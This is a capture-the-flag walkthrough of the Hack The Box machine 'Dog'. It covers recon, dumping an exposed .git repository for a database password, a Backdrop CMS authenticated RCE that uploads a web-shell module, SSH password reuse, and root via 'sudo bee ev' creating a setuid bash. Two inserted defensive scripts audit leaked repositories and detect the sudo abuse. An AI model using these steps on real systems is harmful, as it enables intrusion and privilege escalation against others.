Dog
About this machine: HTB
Operating system: Linux
Skills used:
Python
Hashcrack
We run the first reconnaissance scan:
nmap -p- --open -sS -T4 -Pn -n 10.10.11.58 -oN First_Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-20 18:23 EDT
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 98.91% done; ETC: 18:24 (0:00:00 remaining)
Nmap scan report for 10.10.11.58
Host is up (0.14s latency).
Not shown: 64130 closed tcp ports (reset), 1403 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
We run a service and script scan on the open ports:
nmap -p80,22 -sVC -T4 -Pn -n 10.10.11.58 -oN SV_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-20 18:27 EDT
Nmap scan report for 10.10.11.58
Host is up (0.54s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-title: Home | Dog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We run specific NSE scripts against port 80:
nmap --script "vuln and safe" -p80 10.10.11.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-20 19:32 EDT
Nmap scan report for 10.10.11.58
Host is up (0.14s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases. reference:https://docs.backdro...
We enumerate web directories:
gobuster dir -u "http://10.10.11.58/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://10.10.11.58/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
Starting gobuster in directory enumeration mode
/files                (Status: 301) [Size: 310] [--> http://10.10.11.58/files/]
/themes               (Status: 301) [Size: 311] [--> http://10.10.11.58/themes/]
/modules              (Status: 301) [Size: 312] [--> http://10.10.11.58/modules/]
/sites                (Status: 301) [Size: 310] [--> http://10.10.11.58/sites/]
/core                 (Status: 301) [Size: 309] [--> http://10.10.11.58/core/]
/layouts              (Status: 301) [Size: 312] [--> http://10.10.11.58/layouts/]
We check what is running on port 80:
(screenshot)
We find a /.git directory; inside it there is a logs/HEAD file with the following content:
0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root dog@dog.htb 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
We could not use this to get in over SSH, so we use git-dumper to download the repository:
git-dumper http://10.10.11.58/.git/ /tmp/repo
Inside the cloned repository we find settings.php, which gives us credentials for a database:
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';
We try logging in with the root username and the password from settings.php but get nothing, so we look for other users in the repository:
grep -r dog.htb
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root dog@dog.htb 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root dog@dog.htb 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
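The two leaks above (author identities in the reflog, a database credential in settings.php) are what a site owner should be checking for before a repository ever reaches a web root. The following is an added example written for this page, not code from the original writeup, git-dumper or Backdrop: given the files of a dumped repository it parses .git/logs/HEAD entries, collects e-mail addresses from other files, and reports scheme://user:password@host URLs with the password redacted. The sample repository, the JSON key name and the database password are constructed.

```python
import re
from typing import Dict, List, Optional

# Added example for this writeup; it is not part of the original page and not a
# git-dumper or Backdrop component. Given the files of a dumped repository, it
# reports (a) author identities found in the reflog and (b) credential-bearing
# URLs of the form scheme://user:password@host found in configuration files,
# with the password redacted. Every sample below is constructed.

# One .git/logs/HEAD entry:
#   <old-sha> <new-sha> <name> <email> <unix-ts> <tz>\t<message>
# git writes the e-mail as <addr> and separates the message with a tab; both
# are optional here because a dumped or copy-pasted reflog may have lost them.
REFLOG_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) "
    r"(?P<name>.+?) <?(?P<email>[^\s<>@]+@[^\s<>]+)>? "
    r"(?P<ts>\d+) (?P<tz>[+-]\d{4})[\t ](?P<message>.*)$"
)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# The shape of the $database line in settings.php: scheme://user:password@host
CRED_URL_RE = re.compile(
    r"(?P<scheme>[a-z][a-z0-9+.-]*)://(?P<user>[^:/@\s'\"]+):"
    r"(?P<password>[^@\s'\"]+)@(?P<host>[^/\s'\"]+)"
)


def parse_reflog_line(line: str) -> Optional[dict]:
    """Split one reflog entry into its fields; None if the line does not parse."""
    m = REFLOG_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    entry = m.groupdict()
    entry["timestamp"] = int(entry.pop("ts"))
    return entry


def audit_dumped_repo(files: Dict[str, str]) -> dict:
    """files maps repository-relative path -> text content.

    Returns the sorted identities and the credential findings; the password
    itself never appears in the result, only its length as asterisks.
    """
    identities = set()
    credentials: List[dict] = []
    for path, content in files.items():
        if path.startswith(".git/logs/"):
            for line in content.splitlines():
                entry = parse_reflog_line(line)
                if entry is not None:
                    identities.add(entry["email"])
        else:
            identities.update(EMAIL_RE.findall(content))
        for m in CRED_URL_RE.finditer(content):
            credentials.append({
                "path": path,
                "scheme": m.group("scheme"),
                "user": m.group("user"),
                "host": m.group("host"),
                "password": "*" * len(m.group("password")),
            })
    return {"identities": sorted(identities), "credentials": credentials}


# Constructed stand-in for what git-dumper would leave on disk. The reflog entry
# mirrors the one shown above; the database password is a made-up value.
REFLOG_SAMPLE = (
    "0000000000000000000000000000000000000000 "
    "8204779c764abd4c9d8d95038b6d22b6a7515afa "
    "root <dog@dog.htb> 1738963331 +0000\tcommit (initial): todo: customize url aliases"
)
SAMPLE_REPO: Dict[str, str] = {
    ".git/logs/HEAD": REFLOG_SAMPLE + "\n",
    "settings.php": (
        "<?php\n"
        "$database = 'mysql://root:Example-Pass-2024@127.0.0.1/backdrop';\n"
        "$database_prefix = '';\n"
    ),
    # the key name is made up; only the e-mail value matters here
    "files/config_example/active/update.settings.json": (
        '{\n  "emails": [\n    "tiffany@dog.htb"\n  ]\n}\n'
    ),
}

if __name__ == "__main__":
    report = audit_dumped_repo(SAMPLE_REPO)
    print("identities:", ", ".join(report["identities"]))
    for c in report["credentials"]:
        print(f"credential in {c['path']}: {c['scheme']}://{c['user']}:{c['password']}@{c['host']}")
```

Running it against a real dump is a matter of reading each file into the dictionary. The fix on the server side is independent of the audit: keep .git out of the document root (or deny it in Apache with a DirectoryMatch rule for `\.git/` and `Require all denied`), and keep database credentials out of version-controlled settings files.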
We try with tiffany:
(screenshot)
We are in:
(screenshot)
Once authenticated, we search for exploits for this CMS and find "Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)" on Exploit Database; we copy it to our machine and try running it:
ls
52021.py
To use it, the generated module has to be sent to the target as an archive:
python3 52021.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated!
shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php
ls
shell  52021.py  shell.zip
tar -cvf shell.tar shell/
shell/
shell/shell.info
shell/shell.php
Once archived, we upload it manually at /admin/modules/install:
(screenshot)
It uploaded correctly; now we test whether we can run commands:
(screenshot)
We list the users with a login shell:
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
With these users we try to log in over SSH and check for password reuse:
ssh johncusack@10.10.11.58
johncusack@10.10.11.58's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Wed 21 May 2025 12:41:13 AM UTC

  System load:           0.0
  Usage of /:            47.8% of 6.32GB
  Memory usage:          20%
  Swap usage:            0%
  Processes:             229
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.58
  IPv6 address for eth0: dead:beef::250:56ff:feb0:d2b9

johncusack@dog:~$
We are in; we look for the first flag:
johncusack@dog:~$ ls
user.txt
johncusack@dog:~$ cat user.txt
d33e09644b94da0fba0c26d028d02006
Now we look to escalate privileges and get the last flag:
johncusack@dog:~$ sudo -l
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
We can run /usr/local/bin/bee as root, so we look for an exploit for this particular resource:
I found this command: sudo /usr/local/bin/bee ev "system('cp /bin/bash /tmp/bash && chmod +s /tmp/bash')". It basically runs the bee binary and, through PHP, drops a copy of bash with the setuid bit set, owned by root, into the temporary directory /tmp. For it to work properly it is recommended to run it from /var/www/html, as follows:
johncusack@dog:~$ cd /var/www/html
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee ev "system('cp /bin/bash /tmp/bash && chmod +s /tmp/bash')"
johncusack@dog:/var/www/html$ /tmp/bash -p
bash-5.0# whoami
root
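From the defender's side, the sudoers entry above is the real problem: granting bee as root is granting root-level PHP evaluation, and sudo logs every invocation including its arguments. The following is an added example written for this page, not code from the writeup or from bee: it scans sudo log lines in the syslog/auth.log format sudo writes and flags exactly the two things visible above, a permitted CLI driven into a code-evaluation subcommand and a setuid bit being set from inside a sudo command. The log lines are constructed; the list of evaluation subcommands beyond bee's `ev` is an assumption about comparable tools.

```python
import re
from typing import Dict, List, Optional

# Added example for this writeup, not part of the original page. It scans sudo
# log lines (the syslog/auth.log format sudo writes) and flags the pattern shown
# above: a permitted admin CLI driven into a code-evaluation mode, and a setuid
# bit being set from inside a sudo command. All log lines below are constructed.

SUDO_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sudo(?:\[\d+\])?:\s+"
    r"(?P<user>\S+) : (?:TTY=(?P<tty>\S+) ; )?PWD=(?P<pwd>.*?) ; USER=(?P<runas>\S+) ; "
    r"COMMAND=(?P<cmd>.*)$"
)

# Subcommands that evaluate caller-supplied code. 'ev' is the one used with bee in
# the writeup; the remaining entries are assumptions about comparable CLIs.
EVAL_SUBCOMMANDS: Dict[str, set] = {
    "bee": {"ev", "eval", "php-eval"},
    "drush": {"ev", "eval", "php-eval"},
    "php": {"-r"},
}
# chmod +s, chmod u+s, chmod 4755, chmod 6755: setuid being set on a file
SETUID_RE = re.compile(r"chmod\s+(?:[ugoa]*\+[rwx]*s|[46][0-7]{3})\b")


def analyze_sudo_line(line: str) -> Optional[dict]:
    """Parse one sudo log line; None if it is not a sudo command record."""
    m = SUDO_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    argv = rec["cmd"].split()
    alerts: List[str] = []
    if len(argv) > 1:
        prog = argv[0].rsplit("/", 1)[-1]
        if argv[1] in EVAL_SUBCOMMANDS.get(prog, set()):
            alerts.append(f"code evaluation via {prog} {argv[1]} as {rec['runas']}")
    if SETUID_RE.search(rec["cmd"]):
        alerts.append("setuid bit set inside a sudo command")
    rec["alerts"] = alerts
    return rec


def scan_sudo_log(lines: List[str]) -> List[dict]:
    """Return only the records that raised at least one alert."""
    hits = []
    for line in lines:
        rec = analyze_sudo_line(line)
        if rec is not None and rec["alerts"]:
            hits.append(rec)
    return hits


SAMPLE_LOG = [  # constructed auth.log excerpt
    "May 21 00:39:58 dog sshd[1234]: Accepted password for johncusack from 10.10.14.5 port 51234 ssh2",
    "May 21 00:40:03 dog sudo: johncusack : TTY=pts/0 ; PWD=/home/johncusack ; USER=root ; COMMAND=/usr/local/bin/bee status",
    "May 21 00:45:12 dog sudo: johncusack : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; "
    "COMMAND=/usr/local/bin/bee ev system('cp /bin/bash /tmp/bash && chmod +s /tmp/bash')",
]

if __name__ == "__main__":
    for rec in scan_sudo_log(SAMPLE_LOG):
        print(f"{rec['ts']} {rec['user']} -> {rec['runas']}: {'; '.join(rec['alerts'])}")
```

The benign `bee status` line produces no alert, the `bee ev` line produces two. Detection is the fallback; the fix is to drop the `(ALL : ALL) /usr/local/bin/bee` rule or narrow it to the specific non-evaluating subcommands the user actually needs, since any rule that allows `ev` is equivalent to a root shell.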
Now as root we look for the last flag:
bash-5.0# cd /root
bash-5.0# ls
root.txt
bash-5.0# cat root.txt
629e91f760683659d1e6239a53412ebd
With the root flag captured, we consider this machine done.